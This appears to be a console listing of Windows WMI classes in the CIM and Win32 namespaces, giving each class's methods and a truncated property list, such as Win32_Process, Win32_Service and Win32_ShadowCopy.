{Invoke} {ActionID, Caption, Description, Direction...} CIM_CreateDirectoryAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_CreateFolderAction {Invoke} {ActionID, Caption, Description, Direction...} CIM_RemoveDirectoryAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_RegistryAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_ClassInfoAction {Invoke} {ActionID, AppID, Argument, Caption...} CIM_ModifySettingAction {Invoke} {ActionID, ActionType, Caption, Description...} Win32_SelfRegModuleAction {Invoke} {ActionID, Caption, Cost, Description...} Win32_TypeLibraryAction {Invoke} {ActionID, Caption, Cost, Description...} CIM_ExecuteProgram {Invoke} {ActionID, Caption, CommandLine, Description...} Win32_BindImageAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_RemoveIniAction {Invoke} {Action, ActionID, Caption, Description...} Win32_MIMEInfoAction {Invoke} {ActionID, Caption, CLSID, ContentType...} Win32_FontInfoAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_PublishComponentAction {Invoke} {ActionID, AppData, Caption, ComponentID...} CIM_FileAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_MoveFileAction {Invoke} {ActionID, Caption, Description, DestFolder...} CIM_CopyFileAction {Invoke} {ActionID, Caption, DeleteAfterCopy, Description...} Win32_DuplicateFileAction {Invoke} {ActionID, Caption, DeleteAfterCopy, Description...} CIM_RemoveFileAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_RemoveFileAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_ProductResource {} {Product, Resource} Win32_FolderRedirectionHealth {} {HealthStatus, LastSuccessfulSyncTime, LastSyncStatus, LastSyncTime...} Win32_MountPoint {} {Directory, Volume} CIM_Statistics {} {Element, Stats} CIM_ErrorCountersForDevice {} {Element, Stats} Msft_Providers {Suspend, Resume,... {HostingGroup, HostingSpecification, HostProcessIdentifier, Locale...} Win32_UserProfile {ChangeOwner} {AppDataRoaming, Contacts, Desktop, Documents...} CIM_RelatedStatistics {} {RelatedStats, Stats} CIM_Export {} {Directory, ExportedDirectoryName, LocalFS} Win32_RoamingProfileMachineConfi... {} {AddAdminGroupToRUPEnabled, AllowCrossForestUserPolicy, BackgroundUploadParams, DeleteProfilesOlderDays...} Win32_ManagedSystemElementResource {} {} Win32_SoftwareElementResource {} {Element, Setting} CIM_FRUPhysicalElements {} {Component, FRU} CIM_ParticipatesInSet {} {Element, Set} CIM_FromDirectoryAction {} {FileName, SourceDirectory} Win32_SID {} {AccountName, BinaryRepresentation, ReferencedDomainName, SID...} CIM_ElementCapacity {} {Capacity, Element} Win32_ActionCheck {} {Action, Check} CIM_ElementSetting {} {Element, Setting} Win32_UserDesktop {} {Element, Setting} CIM_MonitorSetting {} {Element, Setting} Win32_DeviceSettings {} {Element, Setting} Win32_PrinterSetting {} {Element, Setting} Win32_NetworkAdapterSetting {} {Element, Setting} Win32_SerialPortSetting {} {Element, Setting} Win32_SystemSetting {} {Element, Setting} Win32_SystemProgramGroups {} {Element, Setting} Win32_SystemBootConfiguration {} {Element, Setting} Win32_SystemTimeZone {} {Element, Setting} Win32_SystemDesktop {} {Element, Setting} Win32_ClassicCOMClassSettings {} {Element, Setting} Win32_VolumeQuota {} {Element, Setting} Win32_WMIElementSetting {} {Element, Setting} Win32_COMApplicationSettings {} {Element, Setting} CIM_VideoSetting {} {Element, Setting} Win32_VideoSettings {} {Element, Setting} Win32_SecuritySettingOfObject {} {Element, Setting} Win32_SecuritySettingOfLogicalShare {} {Element, Setting} Win32_SecuritySettingOfLogicalFile {} {Element, Setting} Win32_PageFileElementSetting {} {Element, Setting} Win32_OperatingSystemAutochkSetting {} {Element, Setting} Win32_VolumeQuotaSetting {} {Element, Setting} CIM_ToDirectorySpecification {} {DestinationDirectory, FileName} CIM_ProductSoftwareFeatures {} {Component, Product} Win32_ProductSoftwareFeatures {} {Component, Product} Win32_ImplementedCategory {} {Category, Component} Win32_RoamingProfileUserConfigur... {} {DirectoriesToSyncAtLogonLogoff, ExcludedProfileDirs, IsConfiguredByWMI} CIM_InstalledSoftwareElement {} {Software, System} Win32_InstalledSoftwareElement {} {Software, System} Win32_SoftwareFeatureCheck {} {Check, Element} Win32_LUIDandAttributes {} {Attributes, LUID} Win32_VolumeUserQuota {} {Account, DiskSpaceUsed, Limit, Status...} Msft_WmiProvider_Counters {} {ProviderOperation_AccessCheck, ProviderOperation_CancelQuery, ProviderOperation_CreateClassEnumAsync, ProviderOperation_CreateInstanceEnumAsy... Win32_LUID {} {HighPart, LowPart} CIM_Check {Invoke} {Caption, CheckID, CheckMode, Description...} CIM_DiskSpaceCheck {Invoke} {AvailableDiskSpace, Caption, CheckID, CheckMode...} CIM_DirectorySpecification {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_DirectorySpecification {Invoke} {Caption, CheckID, CheckMode, DefaultDir...} Win32_SoftwareElementCondition {Invoke} {Caption, CheckID, CheckMode, Condition...} Win32_ODBCDriverSpecification {Invoke} {Caption, CheckID, CheckMode, Description...} CIM_MemoryCheck {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_ServiceSpecification {Invoke} {Caption, CheckID, CheckMode, Dependencies...} CIM_FileSpecification {Invoke} {Caption, CheckID, CheckMode, CheckSum...} Win32_FileSpecification {Invoke} {Attributes, Caption, CheckID, CheckMode...} Win32_IniFileSpecification {Invoke} {Action, Caption, CheckID, CheckMode...} CIM_SoftwareElementVersionCheck {Invoke} {Caption, CheckID, CheckMode, Description...} CIM_SettingCheck {Invoke} {Caption, CheckID, CheckMode, CheckType...} Win32_LaunchCondition {Invoke} {Caption, CheckID, CheckMode, Condition...} Win32_ODBCDataSourceSpecification {Invoke} {Caption, CheckID, CheckMode, DataSource...} Win32_ODBCTranslatorSpecification {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_ProgIDSpecification {Invoke} {Caption, CheckID, CheckMode, Description...} CIM_SwapSpaceCheck {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_EnvironmentSpecification {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_ReserveCost {Invoke} {Caption, CheckID, CheckMode, Description...} CIM_VersionCompatibilityCheck {Invoke} {AllowDownVersion, AllowMultipleVersions, Caption, CheckID...} CIM_OSVersionCheck {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_Condition {Invoke} {Caption, CheckID, CheckMode, Condition...} CIM_ProductFRU {} {FRU, Product} Win32_ShadowStorage {Create} {AllocatedSpace, DiffVolume, MaxSpace, UsedSpace...} Win32_DCOMApplicationAccessAllow... {} {Element, Setting} StdRegProv {CreateKey, Delet... {} CIM_FRUIncludesProduct {} {Component, FRU} Win32_FolderRedirection {} {ContentsMoved, ContentsMovedOnPolicyRemoval, ContentsRenamedInLocalCache, ExclusiveRightsGranted...} CIM_ProductPhysicalElements {} {Component, Product} CIM_CollectedMSEs {} {Collection, Member} Win32_NamedJobObjectProcess {} {Collection, Member} CIM_PhysicalElementLocation {} {Element, PhysicalLocation} Win32_TokenPrivileges {} {PrivilegeCount, Privileges} CIM_CollectionOfMSEs {} {Caption, CollectionID, Description} Win32_NamedJobObject {} {BasicUIRestrictions, Caption, CollectionID, Description} CIM_FromDirectorySpecification {} {FileName, SourceDirectory} Win32_PnPDevice {} {SameElement, SystemElement} CIM_StorageError {} {DeviceCreationClassName, DeviceID, EndingAddress, StartingAddress...} Win32_ServiceSpecificationService {} {Check, Element} Win32_ShareToDirectory {} {Share, SharedElement} Win32_SettingCheck {} {Check, Setting} Win32_PatchFile {} {Check, Setting} Win32_ODBCDriverAttribute {} {Check, Setting} Win32_ODBCDataSourceAttribute {} {Check, Setting} Win32_ClientApplicationSetting {} {Application, Client} CIM_ElementConfiguration {} {Configuration, Element} Win32_RoamingUserHealthConfigura... {} {HealthStatusForTempProfiles, LastProfileDownloadIntervalCautionInHours, LastProfileDownloadIntervalUnhealthyInHours, LastProfileUploadInterva... CIM_ReplacementSet {} {Description, Name} Win32_UserStateConfigurationCont... {} {FolderRedirection, OfflineFiles, RoamingUserProfile} Win32_ServerFeature {} {ID, Name, ParentID} CIM_DirectorySpecificationFile {} {DirectorySpecification, FileSpecification} CIM_SettingContext {} {Context, Setting} Win32_SecuritySettingOwner {} {Owner, SecuritySetting} Win32_LogicalFileOwner {} {Owner, SecuritySetting} CIM_ManagedSystemElement {} {Caption, Description, InstallDate, Name...} CIM_PhysicalElement {} {Caption, CreationClassName, Description, InstallDate...} CIM_PhysicalComponent {} {Caption, CreationClassName, Description, HotSwappable...} CIM_PhysicalMedia {} {Capacity, Caption, CleanerMedia, CreationClassName...} Win32_PhysicalMedia {} {Capacity, Caption, CleanerMedia, CreationClassName...} CIM_Chip {} {Caption, CreationClassName, Description, FormFactor...} CIM_PhysicalMemory {} {BankLabel, Capacity, Caption, CreationClassName...} Win32_PhysicalMemory {} {BankLabel, Capacity, Caption, CreationClassName...} Win32_OnBoardDevice {} {Caption, CreationClassName, Description, DeviceType...} CIM_PhysicalPackage {IsCompatible} {Caption, CreationClassName, Depth, Description...} CIM_Card {IsCompatible} {Caption, CreationClassName, Depth, Description...} Win32_BaseBoard {IsCompatible} {Caption, ConfigOptions, CreationClassName, Depth...} CIM_PhysicalFrame {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...} CIM_Rack {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...} CIM_Chassis {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...} Win32_SystemEnclosure {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...} Win32_PhysicalMemoryArray {IsCompatible} {Caption, CreationClassName, Depth, Description...} CIM_PhysicalConnector {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...} CIM_Slot {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...} Win32_SystemSlot {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...} Win32_PortConnector {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...} CIM_PhysicalLink {} {Caption, CreationClassName, Description, InstallDate...} CIM_LogicalElement {} {Caption, Description, InstallDate, Name...} CIM_Thread {} {Caption, CreationClassName, CSCreationClassName, CSName...} Win32_Thread {} {Caption, CreationClassName, CSCreationClassName, CSName...} Win32_COMApplication {} {Caption, Description, InstallDate, Name...} Win32_DCOMApplication {} {AppID, Caption, Description, InstallDate...} CIM_Job {} {Caption, Description, ElapsedTime, InstallDate...} Win32_ScheduledJob {Create, Delete} {Caption, Command, DaysOfMonth, DaysOfWeek...} Win32_PrintJob {Pause, Resume} {Caption, Color, DataType, Description...} Win32_ServerSession {} {ActiveTime, Caption, ClientType, ComputerName...} CIM_System {} {Caption, CreationClassName, Description, InstallDate...} CIM_ComputerSystem {} {Caption, CreationClassName, Description, InstallDate...} CIM_UnitaryComputerSystem {SetPowerState} {Caption, CreationClassName, Description, InitialLoadInfo...} Win32_ComputerSystem {SetPowerState, R... {AdminPasswordStatus, AutomaticManagedPagefile, AutomaticResetBootOption, AutomaticResetCapability...} CIM_ApplicationSystem {} {Caption, CreationClassName, Description, InstallDate...} Win32_NTDomain {} {Caption, ClientSiteName, CreationClassName, DcSiteName...} CIM_SoftwareFeature {} {Caption, Description, IdentifyingNumber, InstallDate...} Win32_SoftwareFeature {Reinstall, Confi... {Accesses, Attributes, Caption, Description...} CIM_VideoBIOSFeature {} {Caption, CharacteristicDescriptions, Characteristics, Description...} CIM_BIOSFeature {} {Caption, CharacteristicDescriptions, Characteristics, Description...} CIM_LogicalDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_Sensor {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_BinarySensor {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_MultiStateSensor {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_DiscreteSensor {SetPowerState, R... {AcceptableValues, Availability, Caption, ConfigManagerErrorCode...} CIM_NumericSensor {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} CIM_TemperatureSensor {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} Win32_TemperatureProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} CIM_Tachometer {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} CIM_VoltageSensor {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} Win32_VoltageProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} CIM_CurrentSensor {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} Win32_CurrentProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} Win32_Bus {SetPowerState, R... {Availability, BusNum, BusType, Caption...} CIM_UserDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_Keyboard {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_Keyboard {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_Display {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_FlatPanel {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_DesktopMonitor {SetPowerState, R... {Availability, Bandwidth, Caption, ConfigManagerErrorCode...} Win32_DesktopMonitor {SetPowerState, R... {Availability, Bandwidth, Caption, ConfigManagerErrorCode...} CIM_PointingDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_PointingDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_USBDevice {SetPowerState, R... {Availability, Caption, ClassCode, ConfigManagerErrorCode...} CIM_USBHub {SetPowerState, R... {Availability, Caption, ClassCode, ConfigManagerErrorCode...} Win32_USBHub {SetPowerState, R... {Availability, Caption, ClassCode, ConfigManagerErrorCode...} CIM_NetworkAdapter {SetPowerState, R... {AutoSense, Availability, Caption, ConfigManagerErrorCode...} Win32_NetworkAdapter {SetPowerState, R... {AdapterType, AdapterTypeId, AutoSense, Availability...} CIM_AlarmDevice {SetPowerState, R... {AudibleAlarm, Availability, Caption, ConfigManagerErrorCode...} CIM_Battery {SetPowerState, R... {Availability, BatteryStatus, Caption, Chemistry...} Win32_Battery {SetPowerState, R... {Availability, BatteryRechargeTime, BatteryStatus, Caption...} Win32_PortableBattery {SetPowerState, R... {Availability, BatteryStatus, CapacityMultiplier, Caption...} Win32_SoundDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_MotherboardDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_PowerSupply {SetPowerState, R... {ActiveInputVoltage, Availability, Caption, ConfigManagerErrorCode...} CIM_UninterruptiblePowerSupply {SetPowerState, R... {ActiveInputVoltage, Availability, Caption, ConfigManagerErrorCode...} CIM_MediaAccessDevice {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} CIM_DiskDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_DiskDrive {SetPowerState, R... {Availability, BytesPerSector, Capabilities, CapabilityDescriptions...} CIM_DisketteDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_FloppyDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} CIM_TapeDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_TapeDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} CIM_MagnetoOpticalDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} CIM_CDROMDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_CDROMDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} CIM_WORMDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} CIM_Scanner {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_PnPEntity {SetPowerState, R... {Availability, Caption, ClassGuid, CompatibleID...} CIM_PotsModem {SetPowerState, R... {AnswerMode, Availability, Caption, CompressionInfo...} Win32_POTSModem {SetPowerState, R... {AnswerMode, AttachedTo, Availability, BlindOff...} CIM_CoolingDevice {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} CIM_HeatPipe {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} Win32_HeatPipe {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} CIM_Refrigeration {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} Win32_Refrigeration {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} CIM_Fan {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} Win32_Fan {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} CIM_Printer {SetPowerState, R... {Availability, AvailableJobSheets, Capabilities, CapabilityDescriptions...} Win32_Printer {SetPowerState, R... {Attributes, Availability, AvailableJobSheets, AveragePagesPerMinute...} CIM_Controller {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_ManagementController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_SCSIController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_SCSIController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_InfraredController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_InfraredDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_PCIController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_PCMCIAController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_PCMCIAController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_FloppyController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_VideoController {SetPowerState, R... {AcceleratorCapabilities, Availability, CapabilityDescriptions, Caption...} CIM_PCVideoController {SetPowerState, R... {AcceleratorCapabilities, Availability, CapabilityDescriptions, Caption...} Win32_VideoController {SetPowerState, R... {AcceleratorCapabilities, AdapterCompatibility, AdapterDACType, AdapterRAM...} CIM_USBController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_USBController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_SerialController {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_SerialPort {SetPowerState, R... {Availability, Binary, Capabilities, CapabilityDescriptions...} CIM_ParallelController {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_ParallelPort {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_IDEController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_1394Controller {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} CIM_StorageExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...} CIM_Memory {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} CIM_VolatileStorage {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} CIM_NonVolatileStorage {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} CIM_CacheMemory {SetPowerState, R... {Access, AdditionalErrorData, Associativity, Availability...} Win32_CacheMemory {SetPowerState, R... {Access, AdditionalErrorData, Associativity, Availability...} CIM_StorageVolume {SetPowerState, R... {Access, Availability, BlockSize, Caption...} Win32_Volume {SetPowerState, R... {Access, Automount, Availability, BlockSize...} CIM_PhysicalExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...} Win32_SMBIOSMemory {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} Win32_MemoryArray {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} Win32_MemoryDevice {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} CIM_ProtectedSpaceExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...} CIM_AggregatePSExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...} CIM_AggregatePExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...} CIM_VolumeSet {SetPowerState, R... {Access, Availability, BlockSize, Caption...} CIM_LogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...} Win32_LogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...} Win32_MappedLogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...} CIM_DiskPartition {SetPowerState, R... {Access, Availability, BlockSize, Bootable...} Win32_DiskPartition {SetPowerState, R... {Access, Availability, BlockSize, Bootable...} CIM_Processor {SetPowerState, R... {AddressWidth, Availability, Caption, ConfigManagerErrorCode...} Win32_Processor {SetPowerState, R... {AddressWidth, Architecture, Availability, Caption...} Win32_OptionalFeature {} {Caption, Description, InstallDate, InstallState...} Win32_DfsNode {Create} {Caption, Description, InstallDate, Name...} Win32_ComponentCategory {} {Caption, CategoryId, Description, InstallDate...} Win32_ProgramGroupOrItem {} {Caption, Description, InstallDate, Name...} Win32_LogicalProgramGroupItem {} {Caption, Description, InstallDate, Name...} Win32_LogicalProgramGroup {} {Caption, Description, GroupName, InstallDate...} Win32_NetworkConnection {} {AccessMask, Caption, Comment, ConnectionState...} Win32_COMClass {} {Caption, Description, InstallDate, Name...} Win32_ClassicCOMClass {} {Caption, ComponentId, Description, InstallDate...} Win32_Account {} {Caption, Description, Domain, InstallDate...} Win32_UserAccount {Rename} {AccountType, Caption, Description, Disabled...} Win32_Group {Rename} {Caption, Description, Domain, InstallDate...} Win32_SystemAccount {} {Caption, Description, Domain, InstallDate...} CIM_Service {StartService, St... {Caption, CreationClassName, Description, InstallDate...} Win32_BaseService {StartService, St... {AcceptPause, AcceptStop, Caption, CreationClassName...} Win32_SystemDriver {StartService, St... {AcceptPause, AcceptStop, Caption, CreationClassName...} Win32_Service {StartService, St... {AcceptPause, AcceptStop, Caption, CheckPoint...} Win32_TerminalService {StartService, St... {AcceptPause, AcceptStop, Caption, CheckPoint...} CIM_BootService {StartService, St... {Caption, CreationClassName, Description, InstallDate...} Win32_PnPSignedDriver {StartService, St... {Caption, ClassGuid, CompatID, CreationClassName...} CIM_ClusteringService {StartService, St... {Caption, CreationClassName, Description, InstallDate...} Win32_ApplicationService {StartService, St... {Caption, CreationClassName, Description, InstallDate...} Win32_PrinterDriver {StartService, St... {Caption, ConfigFile, CreationClassName, DataFile...} CIM_ServiceAccessPoint {} {Caption, CreationClassName, Description, InstallDate...} Win32_TCPIPPrinterPort {} {ByteCount, Caption, CreationClassName, Description...} CIM_ClusteringSAP {} {Caption, CreationClassName, Description, InstallDate...} CIM_BootSAP {} {Caption, CreationClassName, Description, InstallDate...} Win32_CommandLineAccess {} {Caption, CommandLine, CreationClassName, Description...} CIM_SystemResource {} {Caption, Description, InstallDate, Name...} CIM_MemoryMappedIO {} {Caption, CreationClassName, CSCreationClassName, CSName...} Win32_SystemMemoryResource {} {Caption, CreationClassName, CSCreationClassName, CSName...} Win32_PortResource {} {Alias, Caption, CreationClassName, CSCreationClassName...} Win32_DeviceMemoryAddress {} {Caption, CreationClassName, CSCreationClassName, CSName...} CIM_IRQ {} {Availability, Caption, CreationClassName, CSCreationClassName...} Win32_IRQResource {} {Availability, Caption, CreationClassName, CSCreationClassName...} Win32_Environment {} {Caption, Description, InstallDate, Name...} CIM_DMA {} {AddressSize, Availability, BurstMode, ByteMode...} Win32_DMAChannel {} {AddressSize, Availability, BurstMode, ByteMode...} Win32_Share {Create, SetShare... {AccessMask, AllowMaximum, Caption, Description...} Win32_ClusterShare {Create, SetShare... {AccessMask, AllowMaximum, Caption, Description...} CIM_FileSystem {} {AvailableSpace, BlockSize, Caption, CasePreserved...} CIM_RemoteFileSystem {} {AvailableSpace, BlockSize, Caption, CasePreserved...} CIM_NFS {} {AttributeCaching, AttributeCachingForDirectoriesMax, AttributeCachingForDirectoriesMin, AttributeCachingForRegularFilesMax...} CIM_LocalFileSystem {} {AvailableSpace, BlockSize, Caption, CasePreserved...} Win32_NetworkProtocol {} {Caption, ConnectionlessService, Description, GuaranteesDelivery...} Win32_ShadowProvider {} {Caption, CLSID, Description, ID...} CIM_RedundancyGroup {} {Caption, CreationClassName, Description, InstallDate...} CIM_ExtraCapacityGroup {} {Caption, CreationClassName, Description, InstallDate...} CIM_StorageRedundancyGroup {} {Caption, CreationClassName, Description, InstallDate...} CIM_SpareGroup {} {Caption, CreationClassName, Description, InstallDate...} Win32_QuickFixEngineering {} {Caption, CSName, Description, FixComments...} Win32_IP4RouteTable {} {Age, Caption, Description, Destination...} Win32_ShadowCopy {Create, Revert} {Caption, ClientAccessible, Count, Description...} Win32_LoadOrderGroup {} {Caption, Description, DriverEnabled, GroupOrder...} CIM_Process {} {Caption, CreationClassName, CreationDate, CSCreationClassName...} Win32_Process {Create, Terminat... {Caption, CommandLine, CreationClassName, CreationDate...} Win32_Session {} {Caption, Description, InstallDate, Name...} Win32_LogonSession {} {AuthenticationPackage, Caption, Description, InstallDate...} Win32_ServerConnection {} {ActiveTime, Caption, ComputerName, ConnectionID...} CIM_JobDestination {} {Caption, CreationClassName, Description, InstallDate...} Win32_DfsTarget {} {Caption, Description, InstallDate, LinkName...} Win32_NetworkClient {} {Caption, Description, InstallDate, Manufacturer...} Win32_PageFileUsage {} {AllocatedBaseSize, Caption, CurrentUsage, Description...} CIM_OperatingSystem {Reboot, Shutdown} {Caption, CreationClassName, CSCreationClassName, CSName...} Win32_OperatingSystem {Reboot, Shutdown... {BootDevice, BuildNumber, BuildType, Caption...} CIM_LogicalFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} CIM_Directory {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_Directory {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} CIM_DeviceFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} CIM_DataFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_ShortcutFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_CodecFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_NTEventlogFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_PageFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_IP4PersistedRouteTable {} {Caption, Description, Destination, InstallDate...} Win32_Registry {} {Caption, CurrentSize, Description, InstallDate...} CIM_SoftwareElement {} {BuildNumber, Caption, CodeSet, Description...} CIM_BIOSElement {} {BuildNumber, Caption, CodeSet, Description...} Win32_BIOS {} {BiosCharacteristics, BIOSVersion, BuildNumber, Caption...} Win32_SoftwareElement {} {Attributes, BuildNumber, Caption, CodeSet...} CIM_VideoBIOSElement {} {BuildNumber, Caption, CodeSet, Description...} NTEventlogProviderConfig {} {LastBootUpTime} Win32_ShortcutSAP {} {Action, Element} Win32_MethodParameterClass {} {} Win32_ProcessStartup {} {CreateFlags, EnvironmentVariables, ErrorMode, FillAttribute...} Win32_PingStatus {} {Address, BufferSize, NoFragmentation, PrimaryAddressResolutionStatus...} CIM_ProductSupport {} {Product, Support} CIM_AdjacentSlots {} {DistanceBetweenSlots, SharedSlots, SlotA, SlotB} CIM_SoftwareElementChecks {} {Check, Element, Phase} Win32_SoftwareElementCheck {} {Check, Element, Phase} Win32_ODBCDriverSoftwareElement {} {Check, Element, Phase} CIM_Component {} {GroupComponent, PartComponent} CIM_SystemComponent {} {GroupComponent, PartComponent} Win32_SystemServices {} {GroupComponent, PartComponent} Win32_SystemNetworkConnections {} {GroupComponent, PartComponent} CIM_HostedFileSystem {} {GroupComponent, PartComponent} CIM_ComputerSystemResource {} {GroupComponent, PartComponent} Win32_SystemResources {} {GroupComponent, PartComponent} CIM_ComputerSystemMappedIO {} {GroupComponent, PartComponent} CIM_ComputerSystemDMA {} {GroupComponent, PartComponent} CIM_ComputerSystemIRQ {} {GroupComponent, PartComponent} Win32_SystemBIOS {} {GroupComponent, PartComponent} Win32_SystemLoadOrderGroups {} {GroupComponent, PartComponent} Win32_SystemUsers {} {GroupComponent, PartComponent} CIM_InstalledOS {} {GroupComponent, PartComponent, PrimaryOS} Win32_SystemOperatingSystem {} {GroupComponent, PartComponent, PrimaryOS} CIM_SystemDevice {} {GroupComponent, PartComponent} Win32_SystemDevices {} {GroupComponent, PartComponent} Win32_ComputerSystemProcessor {} {GroupComponent, PartComponent} Win32_SystemPartitions {} {GroupComponent, PartComponent} Win32_SystemSystemDriver {} {GroupComponent, PartComponent} CIM_ApplicationSystemSoftwareFea... {} {GroupComponent, PartComponent} Win32_SystemProcesses {} {GroupComponent, PartComponent} CIM_LinkHasConnector {} {GroupComponent, PartComponent} CIM_CollectionOfSensors {} {GroupComponent, PartComponent} CIM_ProcessThread {} {GroupComponent, PartComponent} 